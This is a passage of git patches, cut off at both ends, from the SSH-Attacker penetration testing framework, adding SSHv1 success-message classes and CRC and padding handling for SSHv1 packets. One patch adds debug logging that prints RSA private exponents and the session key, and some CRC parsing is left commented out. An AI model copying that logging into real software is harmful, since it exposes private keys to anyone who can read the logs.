de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessage; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class SuccessMessageHandler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public SuccessMessageHandler(SshContext context) { + super(context); + } + + /*public HybridKeyExchangeReplyMessageHandler( + SshContext context, HybridKeyExchangeReplyMessage message) { + super(context, message); + }*/ + + @Override + public void adjustContext(SuccessMessage message) { + LOGGER.info("Recived a Success Message"); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/SuccessMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/SuccessMessage.java new file mode 100644 index 000000000..74adfd06a --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/SuccessMessage.java @@ -0,0 +1,47 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.SuccessMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.SuccessMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.SuccessMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.SuccessMessageSerializier; +import java.io.InputStream; + +public class SuccessMessage extends SshMessage { + + @Override + public SuccessMessageHandler getHandler(SshContext context) { + return new SuccessMessageHandler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new SuccessMessageParser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new SuccessMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new SuccessMessageSerializier(this); + } + + @Override + public String toShortString() { + return "SSH_SMSG_SUCCESS"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/SuccessMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/SuccessMessageParser.java new file mode 100644 index 000000000..b34edec83 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/SuccessMessageParser.java @@ -0,0 +1,31 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessage; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class SuccessMessageParser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public SuccessMessageParser(SshContext context, InputStream stream) { + super(stream); + } + + @Override + protected void parseMessageSpecificContents(SuccessMessage message) {} + + @Override + public void parse(SuccessMessage message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/SuccessMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/SuccessMessagePreparator.java new file mode 100644 index 000000000..ff681fa4f --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/SuccessMessagePreparator.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessage; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class SuccessMessagePreparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public SuccessMessagePreparator(Chooser chooser, SuccessMessage message) { + super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_SUCCESS); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/SuccessMessageSerializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/SuccessMessageSerializier.java new file mode 100644 index 000000000..47de4cc55 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/SuccessMessageSerializier.java @@ -0,0 +1,25 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessage; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class SuccessMessageSerializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public SuccessMessageSerializier(SuccessMessage message) { + super(message); + } + + @Override + public void serializeMessageSpecificContents() {} +} From b73bb8b0376b6bc951917bfeed051187b00ca1a0 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 11 Sep 2023 21:09:15 +0200 Subject: [PATCH 080/176] Moving CRC and Padding into BinaryPacketSSHv1 and cleanup --- .../core/layer/impl/PacketLayer.java | 26 -------- .../core/layer/impl/SSH1Layer.java | 30 ++++++++-- .../core/packet/BinaryPacketSSHv1.java | 24 ++++++-- .../core/packet/cipher/PacketCipher.java | 4 +- .../core/packet/cipher/PacketMacedCipher.java | 59 +++++++++++++++++-- .../BinaryPacketSerializerSSHv1.java | 4 +- .../ClientSessionKeyMessageHandler.java | 13 +++- .../ssh1/message/ClientSessionKeyMessage.java | 3 +- .../ssh1/message/DisconnectMessage.java | 3 +- .../ssh1/message/ServerPublicKeyMessage.java | 3 +- .../parser/ClientSessionKeyMessageParser.java | 2 +- .../ssh1/parser/DisconnectMessageParser.java | 2 +- .../parser/ServerPublicKeyMessageParser.java | 2 +- .../ClientSessionKeyMessagePreparator.java | 7 +-- .../ClientSessionKeyMessageSerializer.java | 8 +-- .../DisconnectMessageSerializier.java | 6 +- .../ServerPublicKeyMessageSerializer.java | 35 ++++------- .../core/workflow/action/MessageAction.java | 4 +- .../core/workflow/action/ReceiveAction.java | 4 +- 19 files changed, 142 insertions(+), 97 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index 730fe46d1..938fe0f1c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -7,7 +7,6 @@ */ package de.rub.nds.sshattacker.core.layer.impl; -import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.CipherMode; import de.rub.nds.sshattacker.core.constants.CompressionAlgorithm; @@ -42,7 +41,6 @@ import de.rub.nds.sshattacker.core.protocol.transport.parser.*; import java.io.IOException; import java.io.InputStream; -import java.util.Arrays; import java.util.LinkedList; import java.util.List; import org.apache.logging.log4j.LogManager; @@ -182,30 +180,6 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException decryptPacket(packet); decompressPacket(packet); - // for SSHv1 we need to remove the padding here! //TODO: can be changed? - if (packet instanceof BinaryPacketSSHv1) { - BinaryPacketSSHv1 binaryPacketSSHv1 = (BinaryPacketSSHv1) packet; - - int paddingLenght = (8 - binaryPacketSSHv1.getLength().getValue() % 8); - byte[] padding = Arrays.copyOfRange(packet.getPayload().getValue(), 0, paddingLenght); - byte[] cleanContent = - Arrays.copyOfRange( - packet.getPayload().getValue(), - paddingLenght, - binaryPacketSSHv1.getLength().getValue() + paddingLenght); - - LOGGER.debug( - "Lenght = {}, so padding is {} long and has {} as value, clean is now {} which is {} long", - binaryPacketSSHv1.getLength().getValue(), - paddingLenght, - padding, - ArrayConverter.bytesToHexString(cleanContent), - cleanContent.length); - packet.setPayload(ModifiableVariableFactory.safelySetValue(null, cleanContent)); - } else { - packet.setPayload(packet.getPayload()); - } - LOGGER.debug( "[bro] Decompressed Payload: {}", ArrayConverter.bytesToHexString(packet.getPayload())); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index b9d14a908..847ab5649 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -39,9 +39,7 @@ import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.protocol.common.*; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.*; import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; import de.rub.nds.sshattacker.core.protocol.transport.parser.AsciiMessageParser; @@ -248,7 +246,7 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { switch (id) { case SSH_MSG_DISCONNECT: LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); - // return new PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1.SSH_MSG_DISCONNECT); + readDisconnectData((BinaryPacket) packet); break; case SSH_SMSG_PUBLIC_KEY: LOGGER.debug("[bro] returning SSH_SMSG_PUBLIC_KEY Hint"); @@ -284,6 +282,10 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_CLOSE Hint"); break; // return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_CLOSE); + case SSH_SMSG_SUCCESS: + LOGGER.debug("[bro] returning SSH_SMSG_SUCCESS Hint"); + readSuccessMessage((BinaryPacket) packet); + break; default: LOGGER.debug( "[bro] cannot identifie {} as {} - returningn null", @@ -310,6 +312,26 @@ private void readSessionKeyData(AbstractPacket packet) { readContainerFromStream(message, context, temp_stream); } + private void readDisconnectData(AbstractPacket packet) { + DisconnectMessage message = new DisconnectMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + + private void readSuccessMessage(AbstractPacket packet) { + SuccessMessage message = new SuccessMessage(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + public void readMessageForHint(PacketLayerHintSSHV1 hint) { switch (hint.getType()) { // use correct parser for the message diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java index 0a1fbba84..baa0f573d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java @@ -11,7 +11,6 @@ import de.rub.nds.modifiablevariable.ModifiableVariableProperty; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; -import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.DataContainer; import de.rub.nds.sshattacker.core.layer.data.Handler; @@ -36,9 +35,12 @@ public class BinaryPacketSSHv1 extends AbstractPacket @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.LENGTH) private ModifiableInteger length; + @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_RECORD) + private ModifiableByteArray CrcChecksum; + /** The length of the padding. Must be at least 4 bytes and at most 255 bytes to be valid. */ @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.LENGTH) - private ModifiableByte paddingLength; + private ModifiableInteger paddingLength; /** The padding bytes of the packet. */ @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PADDING) @@ -72,15 +74,15 @@ public void setLength(int length) { this.length = ModifiableVariableFactory.safelySetValue(this.length, length); } - public ModifiableByte getPaddingLength() { + public ModifiableInteger getPaddingLength() { return paddingLength; } - public void setPaddingLength(ModifiableByte paddingLength) { + public void setPaddingLength(ModifiableInteger paddingLength) { this.paddingLength = paddingLength; } - public void setPaddingLength(byte paddingLength) { + public void setPaddingLength(int paddingLength) { this.paddingLength = ModifiableVariableFactory.safelySetValue(this.paddingLength, paddingLength); } @@ -149,6 +151,18 @@ public void setComputations(PacketCryptoComputations computations) { this.computations = computations; } + public ModifiableByteArray getCrcChecksum() { + return CrcChecksum; + } + + public void setCrcChecksum(ModifiableByteArray crcChecksum) { + CrcChecksum = crcChecksum; + } + + public void setCrcChecksum(byte[] crcChecksum) { + CrcChecksum = ModifiableVariableFactory.safelySetValue(this.CrcChecksum, crcChecksum); + } + @Override public void prepareComputations() { LOGGER.info("[bro] Preparing Computation"); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java index 07c291315..b3d28f242 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java @@ -136,9 +136,7 @@ protected byte[] calculatePadding(int paddingLength) { } protected byte calculatePaddingLengthSSHv1(BinaryPacketSSHv1 packet) { - - // TODO: fix later, just for debugging padding - int lenght = packet.getCompressedPayload().getValue().length; + int lenght = packet.getLength().getValue(); int padding_lenght = 8 - (lenght % 8); return (byte) padding_lenght; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java index d623ca9bb..cc00e2637 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java @@ -10,6 +10,7 @@ import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; +import de.rub.nds.sshattacker.core.crypto.checksum.CRC; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; import de.rub.nds.sshattacker.core.crypto.mac.AbstractMac; @@ -85,11 +86,34 @@ public PacketMacedCipher( } } + private void calculateCrcChecksum(BinaryPacketSSHv1 binaryPacket) { + CRC crc32 = new CRC(); + byte[] value = + ArrayConverter.concatenate( + binaryPacket.getPadding().getValue(), + binaryPacket.getCompressedPayload().getValue()); + byte[] checksum = ArrayConverter.longToBytes(crc32.calculateCRC(value), 4); + binaryPacket.setCrcChecksum(checksum); + LOGGER.debug( + "CRC: " + + ArrayConverter.bytesToRawHexString( + binaryPacket.getCrcChecksum().getValue())); + } + @Override public void encrypt(BinaryPacketSSHv1 packet) { + + packet.setLength( + packet.getCompressedPayload().getValue().length + 4); // +4 for CRC-Checksum + packet.setPaddingLength(calculatePaddingLengthSSHv1(packet)); packet.setPadding(calculatePadding(packet.getPaddingLength().getValue())); - packet.setLength(packet.getCompressedPayload().getValue().length); + + packet.setCompressedPayload( + ArrayConverter.concatenate( + packet.getPadding().getValue(), packet.getCompressedPayload().getValue())); + + calculateCrcChecksum(packet); PacketCryptoComputations computations = packet.getComputations(); try { @@ -102,11 +126,6 @@ public void encrypt(BinaryPacketSSHv1 packet) { Stream.of(BinaryPacketField.PAYLOAD).collect(Collectors.toSet())); } - @Override - public void decrypt(BinaryPacketSSHv1 packet) throws CryptoException { - decryptInner(packet); - } - @Override public void encrypt(BinaryPacket packet) throws CryptoException { if (packet.getComputations() == null) { @@ -191,8 +210,12 @@ private void encryptInner(AbstractPacket packet) throws CryptoException { byte[] plainData; if (packet instanceof BinaryPacket) { plainData = ((BinaryPacket) packet).getComputations().getPlainPacketBytes().getValue(); + LOGGER.debug( + "PlainData from Computation: {}", ArrayConverter.bytesToHexString(plainData)); } else { plainData = packet.getCompressedPayload().getValue(); + LOGGER.debug( + "PlainData from Compression: {}", ArrayConverter.bytesToHexString(plainData)); } if (encryptionAlgorithm.getIVSize() > 0) { @@ -212,6 +235,30 @@ private void encryptInner(AbstractPacket packet) throws CryptoException { } } + @Override + public void decrypt(BinaryPacketSSHv1 packet) throws CryptoException { + decryptInner(packet); + + DecryptionParser parser = new DecryptionParser(packet.getPayload().getValue()); + + packet.setPaddingLength(8 - packet.getLength().getValue() % 8); + packet.setPadding(parser.parseByteArrayField(packet.getPaddingLength().getValue())); + + byte[] newPayload = parser.parseByteArrayField(packet.getLength().getValue() - 4); + + packet.setCrcChecksum(parser.parseByteArrayField(4)); + + LOGGER.debug("DEBUGGER"); + LOGGER.debug( + "Padding: {}", ArrayConverter.bytesToHexString(packet.getPadding().getValue())); + LOGGER.debug("Payload: {}", ArrayConverter.bytesToHexString(newPayload)); + LOGGER.debug( + "CRC_Checksum: {}", + ArrayConverter.bytesToHexString(packet.getCrcChecksum().getValue())); + + packet.setCompressedPayload(newPayload); + } + @Override public void decrypt(BinaryPacket packet) throws CryptoException { if (packet.getComputations() == null) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java index b166a63e1..db5f13a09 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializerSSHv1.java @@ -37,7 +37,7 @@ protected byte[] serializeBytes() { LOGGER.debug("Packet length: {}", binaryPacket.getLength().getValue()); } if (!encryptedFields.contains(BinaryPacketField.PADDING)) { - appendBytes(binaryPacket.getPadding().getValue()); + // appendBytes(binaryPacket.getPadding().getValue()); LOGGER.debug( "Padding: {}", ArrayConverter.bytesToHexString(binaryPacket.getPadding().getValue())); @@ -56,6 +56,8 @@ protected byte[] serializeBytes() { "MAC / Authentication tag: {}", ArrayConverter.bytesToHexString(binaryPacket.getMac().getValue()));*/ + appendBytes(binaryPacket.getCrcChecksum().getValue()); + binaryPacket.setCompletePacketBytes(getAlreadySerialized()); LOGGER.debug( "Complete packet bytes: {}", diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java index 4bd53e314..6b208f0a2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java @@ -56,7 +56,6 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoE SshPublicKey serverkey = sshContext.getServerKey(); SshPublicKey hostKey = sshContext.getHostKey().orElseThrow(); - if (serverkey.getPrivateKey().isPresent() && serverkey.getPrivateKey().get() instanceof CustomRsaPrivateKey) { serverPrivatKey = (CustomRsaPrivateKey) serverkey.getPrivateKey().get(); @@ -71,6 +70,18 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoE throw new CryptoException("Private-Host-Key is Missing"); } + LOGGER.debug( + "Server: \n Key: {} \n Mod: {}", + ArrayConverter.bytesToRawHexString( + serverPrivatKey.getPrivateExponent().toByteArray()), + ArrayConverter.bytesToRawHexString(serverPrivatKey.getModulus().toByteArray())); + LOGGER.debug( + "Host: \n Key: {} \n Mod: {}", + ArrayConverter.bytesToRawHexString( + hostPrivateKey.getPrivateExponent().toByteArray()), + ArrayConverter.bytesToRawHexString(hostPrivateKey.getModulus().toByteArray())); + LOGGER.debug("Message: {}", ArrayConverter.bytesToRawHexString(sessionKey)); + AbstractCipher innerEncryption; AbstractCipher outerEncryption; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java index 0c4bc1819..5ce7c4f44 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java @@ -133,8 +133,7 @@ public SshMessagePreparator getPreparator(SshContext co @Override public SshMessageSerializer getSerializer(SshContext context) { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new ClientSessionKeyMessageSerializer(this, kex.getCombiner()); + return new ClientSessionKeyMessageSerializer(this); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessage.java index a773c74d9..0af4537be 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessage.java @@ -57,8 +57,7 @@ public SshMessagePreparator getPreparator(SshContext context) @Override public SshMessageSerializer getSerializer(SshContext context) { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new DisconnectMessageSerializier(this, kex.getCombiner()); + return new DisconnectMessageSerializier(this); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java index 69bf84c13..7e2bedf10 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java @@ -318,8 +318,7 @@ public SshMessagePreparator getPreparator(SshContext con @Override public SshMessageSerializer getSerializer(SshContext context) { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new ServerPublicKeyMessageSerializer(this, kex.getCombiner()); + return new ServerPublicKeyMessageSerializer(this); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ClientSessionKeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ClientSessionKeyMessageParser.java index e6b5e2791..bf8893a07 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ClientSessionKeyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ClientSessionKeyMessageParser.java @@ -170,7 +170,7 @@ protected void parseMessageSpecificContents(ClientSessionKeyMessage message) { parseAntiSpoofingCookie(message); parseSessionKey(message); parseProtocolFlags(message); - parseCRC(message); + // parseCRC(message); // parseHybridKey(message); // parseSignature(message); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DisconnectMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DisconnectMessageParser.java index 43df95b77..266e7c0d5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DisconnectMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DisconnectMessageParser.java @@ -136,7 +136,7 @@ private void parseProtocolFlags(DisconnectMessage message) {} @Override protected void parseMessageSpecificContents(DisconnectMessage message) { parseDisconnectReason(message); - parseCRC(message); + // parseCRC(message); // parseHybridKey(message); // parseSignature(message); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java index d39c9c744..452f589ae 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java @@ -258,7 +258,7 @@ protected void parseMessageSpecificContents(ServerPublicKeyMessage message) { parseProtocolFlags(message); parseCipherMask(message); parseAuthMask(message); - parseCRC(message); + // parseCRC(message); // parseHybridKey(message); // parseSignature(message); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index b75213704..99a1d2907 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -22,7 +22,6 @@ import java.security.NoSuchAlgorithmException; import java.util.List; import java.util.Random; - import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -31,8 +30,7 @@ public class ClientSessionKeyMessagePreparator private static final Logger LOGGER = LogManager.getLogger(); - public ClientSessionKeyMessagePreparator( - Chooser chooser, ClientSessionKeyMessage message) { + public ClientSessionKeyMessagePreparator(Chooser chooser, ClientSessionKeyMessage message) { super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_SESSION_KEY); } @@ -119,7 +117,6 @@ private void prepareSessionKey() throws CryptoException { sessionKey[i] = (byte) (sesseionByte ^ sessionKey[i++]); } - CustomRsaPublicKey hostPublickey; CustomRsaPublicKey serverPublicKey; @@ -199,7 +196,7 @@ public void prepareMessageSpecificContents() { try { prepareSessionKey(); } catch (CryptoException e) { - LOGGER.fatal("Error while encrypting Session key {}.",e.getMessage()); + LOGGER.fatal("Error while encrypting Session key {}.", e.getMessage()); throw new RuntimeException(e); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java index 405ee1cc8..a8b9077ee 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java @@ -8,7 +8,6 @@ package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; import de.rub.nds.sshattacker.core.crypto.checksum.CRC; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; @@ -20,12 +19,9 @@ public class ClientSessionKeyMessageSerializer extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); - private HybridKeyExchangeCombiner combiner; - public 